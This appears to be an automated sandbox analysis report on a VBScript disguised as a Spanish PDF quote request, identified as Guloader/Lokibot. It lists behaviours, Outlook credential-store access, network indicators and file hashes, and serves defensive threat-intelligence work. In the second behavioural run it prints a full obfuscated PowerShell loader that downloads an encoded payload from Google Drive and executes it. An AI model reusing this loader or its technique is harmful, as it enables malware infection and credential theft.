Analysis Overview
SHA256
959ec9d9287432e3234cf35de1ad899ad4ae44d06e2bbf4fd0fe806b58ee6e21
Threat Level: Known bad
The file Solicitud de presupuesto Urgente 554PE·pdf.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader, Cloudeye
Lokibot
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
outlook_win_path
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-25 16:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-25 16:26
Reported
2024-03-25 16:28
Platform
win7-20240215-en
Max time kernel
141s
Max time network
139s
Command Line
Signatures
Guloader, Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2752 set thread context of 3056 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt
| MD5 | cf56f5795de669e0ee0796627c7142f2 |
| SHA1 | 89a71383fe582e3ec82a024fd424cef08943daf9 |
| SHA256 | 858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf |
| SHA512 | c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\13W2C00ZFSWHOREFU16J.temp
| MD5 | b9db5309c55375cba4808735274121b5 |
| SHA1 | 4086e67f71b96aa911e1271e985ec19984843e25 |
| SHA256 | 135d3db0c26fdaab48ef70fd73fe5728508d705267ee1b92305641a7dfb5c986 |
| SHA512 | a4551402534ed0dfdbe018a5d3a8cc16732243147e408205ede6c3452480f006ed0407517a0cb666a6d673cccbd91fe7b30bc5b5ddb548941c9dcfc26aae655e |
C:\Users\Admin\AppData\Local\Temp\Cab7EE0.tmp
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0e42bc5bdbf9ab895bb027528edc4139 |
| SHA1 | f59fcec40aaff2f623d5588c1d448982556cc0ee |
| SHA256 | 81c5a394565213f61de809e0dd1fd0972bfe0c36dc4c446ea986726bbf8e1fb1 |
| SHA512 | 71876b71b0bdfba832046c8f1f1ba43f3a35f951096d5d3e972f86e3696801ee3e23c1c86905f63aaedfc6309efd6c09693e0e65cfaae0102ad5439efacf980a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 17377c3f45ec353713f1d897171100af |
| SHA1 | f30b5fd3577754f5ce25d28982fee6283fb9e0c1 |
| SHA256 | 588353a715417a08f3eab42ee1a94afdeda0173661584c726e0347aaf82c5a73 |
| SHA512 | 6ba88b1f1168df5674e0226555ca5c9d645412602d18450d747778156016e6fb7043a09fb38e12cb2d820d662ca9cf1a50c3409f39b16d57eb775ccc7dc1825c |
C:\Users\Admin\AppData\Local\Temp\TarF46E.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-25 16:26
Reported
2024-03-25 16:28
Platform
win10v2004-20240226-en
Max time kernel
140s
Max time network
144s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS 
,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. 
Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. 
Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3140 -ip 3140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 2520
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 20.231.121.79:80 | | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt
| MD5 | 4c4cc23f3a17e931d1972c751c095e49 |
| SHA1 | 5e1298fed9d1e92444447d4257ef0e5fcd66031d |
| SHA256 | b068b30fb603c1a1bb4efbae00c421a6b5014f15b5757dfaff0348d8236be129 |
| SHA512 | 8a77950e5c116e1f925eac15458990a8aebc5abd3330d9d3e81d5e0a4faf1811dde4e21d8c4cddff0aa086f595d1a867d4965392089a56699354f2535c635181 |
C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt
| MD5 | cf56f5795de669e0ee0796627c7142f2 |
| SHA1 | 89a71383fe582e3ec82a024fd424cef08943daf9 |
| SHA256 | 858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf |
| SHA512 | c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wuuj24qa.3nd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3148-254-0x000001F73C7C0000-0x000001F73C7E2000-memory.dmp
memory/3148-258-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp
memory/3148-259-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3148-260-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3148-261-0x000001F754DC0000-0x000001F754DE6000-memory.dmp
memory/3148-262-0x000001F757320000-0x000001F757334000-memory.dmp
memory/3148-263-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3148-264-0x000001F754E20000-0x000001F754E30000-memory.dmp
memory/3140-265-0x0000000004F40000-0x0000000004F76000-memory.dmp
memory/3140-266-0x0000000075060000-0x0000000075810000-memory.dmp
memory/3140-267-0x0000000002B80000-0x0000000002B90000-memory.dmp
memory/3140-268-0x0000000002B80000-0x0000000002B90000-memory.dmp
memory/3140-269-0x00000000055B0000-0x0000000005BD8000-memory.dmp
memory/3140-270-0x0000000005520000-0x0000000005542000-memory.dmp
memory/3140-272-0x0000000005DC0000-0x0000000005E26000-memory.dmp
memory/3140-271-0x0000000005D50000-0x0000000005DB6000-memory.dmp
memory/3140-282-0x0000000005EF0000-0x0000000006244000-memory.dmp
memory/3140-283-0x00000000064F0000-0x000000000650E000-memory.dmp
memory/3140-284-0x0000000006530000-0x000000000657C000-memory.dmp
memory/3140-285-0x0000000007D40000-0x00000000083BA000-memory.dmp
memory/3140-286-0x0000000006AF0000-0x0000000006B0A000-memory.dmp
memory/3140-287-0x0000000007770000-0x0000000007806000-memory.dmp
memory/3140-288-0x0000000007720000-0x0000000007742000-memory.dmp
memory/3140-289-0x0000000008970000-0x0000000008F14000-memory.dmp
memory/3140-290-0x0000000007990000-0x00000000079B2000-memory.dmp
memory/3140-291-0x00000000079F0000-0x0000000007A04000-memory.dmp
memory/3140-292-0x0000000075060000-0x0000000075810000-memory.dmp
memory/3148-295-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp